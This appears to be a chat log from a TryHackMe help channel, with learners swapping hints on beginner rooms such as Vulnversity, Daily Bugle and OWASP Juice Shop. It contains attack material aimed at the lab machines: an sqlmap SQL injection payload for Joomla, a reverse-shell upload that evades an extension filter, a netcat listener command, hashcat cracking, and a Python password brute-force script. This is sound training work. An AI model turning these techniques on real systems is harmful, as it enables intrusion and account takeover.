@white salmon tldr the writeup he's following (think the one attached to the room?) shows a secret.txt.. but looks like thats not there anymore?
uh
Well it not how the write up described
At the last parts don't match the writeup
But thanks
It says If you are using Kali Linux you can find many wordlists under /usr/share/wordlists. But I am using Manjaro so how do I find the wordlists?
right here
you can git clone the whole repo or you can just download the ones you want
@keen flax
@keen flax You want this...
ok
SecLists is a great bunch of wordlists, but for what you're doing (keep it simple..) when you clone the repo it'll have an ok wordlist for vulneversity, I would clone SecLists as well, you will use it
do I clone the whole SecLists repo?
ok
Sorry @night fractal didnt mean to step on your toes.
they want you to use wordlists for gobuster so you could just get https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/directory-list-2.3-medium.txt for a more thorough search, and https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/common.txt for a faster search of the most common directories
all good man, I just wanted him to do a bit of research and find out the ones he need by himself, while also providing him with stuff he may need later
Yeah, I sensed that after I jumped all in it...its Christmas, my son wouldnt let me sleep, so I wasnt thinking lol
IM like "nope, not today"
my mans got lucky
so i dont think that has anything to do with it lol
good for you
nah, i got 5...luck was not with me
it just means I ain't gonna get a gf
Bruv...theres someone for everyone....sometimes it just takes time...
wow, I didn't see that coming, that must be tough on you and your wife
welllll I mean sometimes....but most days its nothing...I just get spread thin...cause each one has a different personality and needs different things at any given moment...ive been up since 4 screwing around enjoying my quiet time. lol
yeah, takes a lot of patience and hard work, I'm glad that you can keep it up
Room:
https://tryhackme.com/room/dailybugle
I figured out Joomla Version, found SQLi, dumped passwords with sqlmap, get a user named root with hash, but no success in cracking it with simple rockyou + best64.rules
Am I right, i should not crack this root mysql password?
Am I right, i should look for joomla users in Database via SQLi to obtain another users hash?
Someone is doing this box right now?
The box went off, after 1h + 1h extended, so i deployed again, but sqlmap need figuring out again the injection points.
||Parameter: list[fullordering] (GET)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 9809 FROM(SELECT COUNT(*),CONCAT(0x716a6a7671,(SELECT (ELT(9809=9809,1))),0x716a7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)||
How i can faster resume sqlmap while IP/domain is changing?
Thank u for some hints and telling me if iam on the right way to own the box.
@night fractal I used this https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/common.txt and ran that cmd but idk how to find what they are asking
gobuster dir -u http://<ip>:3333 -w <word list location> This cmd
*Instead of using SQLMap, why not use a python script!* You can get exploits for Joomla. The hash is bcrypt and is a slow encryption method. It will take time to Decrypt the hash, you can reduce your Wordlist to reduce the time.
can you post the output of the gobuster command that you ran?
It was doing this
Progress : num/4662
yes
so you hit some directories like /uploads or /admin ?
[+] Wordlist: /usr/share/wordlists/common
k, that's good
I'm interested in the output of the search tho
kinda like on that screenshot you can see it hit /index /index.php and lots of others
did you get any hits?
```
/.hta (Status: 403) [Size: 293]
/.htaccess (Status: 403) [Size: 298]
/.htpasswd (Status: 403) [Size: 298]
/css (Status: 301) [Size: 317] [--> http://10.10.163.86:3333/css/]
Progress: 1313 / 4662 (28.16%) Progress: 1324 / 4662 (28.40%)
```
Do you mean this?
yeah
those are all directories that exist on the box
let it run through the whole wordlist and see if there's anything interesting
I think I will run the command again cuz I think it was messed up
it should be just gobuster dir -u http://BOXIP -w /full/path/to/wordlist
bingo
thx for the help
you're welcome
btw I am stuck here Compromise the webserver lol
where exactly are you stuck
idk where to start
Try upload a few file types to the server, what common extension seems to be blocked?
it says this
yeah
but it never told how to upload
jonhas hash is bcrypt $2*$, Blowfish (Unix), right
but the root hash dumped with "sqlmap --passwords" seems be MYSQL hash
no problem, i got jonahs password with hashcat -m3200 rockyou.txt
thank u!
the previous question was to find a directory where you can upload stuff so...
tbh you don't even need burp for this room
but learning Burp can be helpful
it's just a bit messed bc the interface changed since lot of the tutorials were made
I mean it says there
To identify which extensions are not blocked, we're going to fuzz the upload form.
To do this, we're doing to use BurpSuite.
yeah
but then they're gonna upload 5 files
which you could've done on your own
my suggestion is to leave Burp for later, like after finishing this room, bc it can be useful, but then again it is your choice and I'm not making you do anything against your will
I don't exactly know how you would do this
pretty sure if you open http://BOXIP/internal you'll get a website
nope
even with the port 3333?
'cause I'm pretty sure there should be a page where you can upload files bc if you're gonna use burp you'll first want to capture some traffic, which will be generated from your browser by visiting a page and interacting with it
are you by any chance trying to visit it via https and not http?
idk to be fair, I'm pretty sure visiting it without http and putting http in front doesn't change anything
putting https does change some things tho
exactly
ok
now you can either set up a proxy and capture some traffic with burp, and then automate uploading files with different extensions
oof let me add .txt in front of my file xD
or you can just make some files of your own and do it manually
ok
without messing with proxy server and burp
for whatever reason they just don't allow uploading .txt files
you can try some other extensions like .png .jpg and what you're mostly interested in .php and similar extensions that allow you to embed php code in them
yeah
which makes sense
if someone uploads a .php file they could get code execution by navigating to the ||uploads folder|| that you also hopefully found with gobuster
.php are blocked right
yup
you may wanna search online for what php extensions exist, since .php isn't the only one
I know some
can you successfully upload any of them?
yes
Whenever I visit : http://<ip>:3333/internal/uploads/php-reverse-shell.phtml
I get : WARNING: Failed to daemonise. This is quite common and not fatal. Connection timed out (110)
first of all, did you change the IP and port in the revshell?
yes
yeah, that's gonna start a listener on port 3333
and I guess you set the port to 3333 in the revshell
?
yes
might be your firewall then
makes sense
@keen flax If you are experiencing an issue with the reverse shell on AoC2 Day 2 with a failed to daemonize, connection refused (111) error, run through these steps to see if it resolves:
- Is your listener running as root? ports below `1024` require root privileges to open, you need to either have a root account or use sudo, an example of this would be `sudo nc -lvnp 443`.
- Your port number in the reverse shell script must be same as in your listener.
- Your IP in the reverse shell script should not be `10.10.x.x`, that is your room IP, you need to use your `eth0`/`tun0` IP depending on if you're using the in-browser machines or openvpn.
I wrote that for AOC day 2 but it's still relevant for what you're doing
If you get a connection timed out it's almost always because your listener is improperly setup or your script is improperly setup
I am doing Vulnversity
they said the problem was in the firewall tho
yes
@solemn smelt
So this is what it asks What is the name of the user who manages the webserver? but the thing I got in terminal doesn't tell that
which user are you right now
?
whoami?
yup
true
I just forgot how I got the answer so I thought maybe it logs you in as that user
so you can see are there any users in /home
OwO
bruh
how are you supposed to know that
most of your users that are used by people and not services have their own home directory
it's common linux knowledge
Hello guys, i'm doing Bookstore room and have a question about privesc to root. I saw binary file try-harder, and i saw that it needs to be reversed somehow. Any advice for reverse tool aside from ghidra?
there's IDA, but I don't know how useful the free version is
you can use radare but it's kinda messed up unless you're used to it
Yeah, i used IDA free on linux but it cannot be converted to pseudo code C-like code unlike the pro version
Nvm, i just try ghidra and it is not as hard as i thought
Room:
https://tryhackme.com/room/dailybugle
Im trying msf6 exploit(unix/webapp/joomla_comfields_sqli_rce) on this Joomla ||3.7.0||
but msf check fails, exploit fails with "Error retrieving table prefix"
i looked here, but cant read ruby: https://www.exploit-db.com/exploits/44358
wireshark show me error 500 while trying check or exploit
How to get this RCE working or is it because of the weird table prefixes I discovered with sqlmap? Should I stop trying use MSF RCE, should I focus on webshell and privesc? Thank u
what i got till now is joomla version, mysql root hash, joomla superuser username and hash and password, but still no root (ssh) :-)
Any suggestion for me please?
@white salmon the RCE isn't the intended route so I'd skip over it.
If you've got a shell, focus on escalation
Sec list already comes with kali
On linux strength training, Task 9, I was trying to create a hash file of sql backups, but it's keep showing this. Any hints?
I am stuck on this task too!
hello guys , on linux strength training , task 9 im stuck on sql back-up password , any hint ?
does anyone know the answer to the question "What is the value of the web.txt flag?" of the last day? i am stuck and run out of time, and even if you know about the user.txt flag and robot.txt flag last day
i am talking about the adventofcyber2 room
oh! turns out that everybody is stuck on this task
no i still cant find the password of the back-up database that starts with ebq
Hey there, stuck with linux fundamentals 2 task 11. guess you need to execute ./shiba2 to get shiba3's passwd, but this only generates a segmentation fault (core dumped). Any hints appreciated!
That means you haven't set the variable @white salmon
thx a lot NinjaJc01|James!
I'm trying to do the https://tryhackme.com/room/owaspjuiceshop task 4/question 1 but the burp intruder attack using the best1050.txt password list has been running for about 20 minutes and it's only at password 275. (I'm using the attack box). Is there something that could be done to speed things up or some config I might have done wrong to have such slow speeds? It seems to be entirely internal to burp. And ofc still no 200 response
I also tried to emulate the attack with a python script
||```python
import requests
from pathlib import Path

# Password list shipped with SecLists on the attack box
p = Path('/usr/share/wordlists/SecLists/Passwords/Common-Credentials/best1050.txt')
s = requests.session()
s.get('http://10.10.207.58')
for pwd in p.read_text().split():
    print(pwd)
    # Any status other than 401 is treated as a successful login
    if s.post('http://10.10.207.58/rest/user/login', data={"email":"admin@juice.sh.op","password":pwd.strip()}).status_code != 401:
        print("!!!")
        break
```||
yeah I was considering wfuzz but wasn't sure if it handled json payloads / if the server accepted query params instead of json
yeah, it will send whatever data you tell it to
nice I'll try and see if there's more luck there, but it's a bit strange as it's a very step by step room that it has a part that seems to take hours to complete
yeah they assume you have BURP premium
like who's gonna have that?
anyway zap is probably nearly as good as burp, save a few features
yeah, a bit more a challenge to translate the instructions to zap, but perhaps better learning, but there's something I'm doing wrong too because none of the passwords seems to work
take a screenshot of your intruder window
in your python script you have admin@juice.sh.op should it be admin@juice-sh.op
lol
the answer is in the first 200 in that file so you if you get past that theres something wrong
yeah had same typo in burp
Someone can help me with this task , (nmap room)
my bad
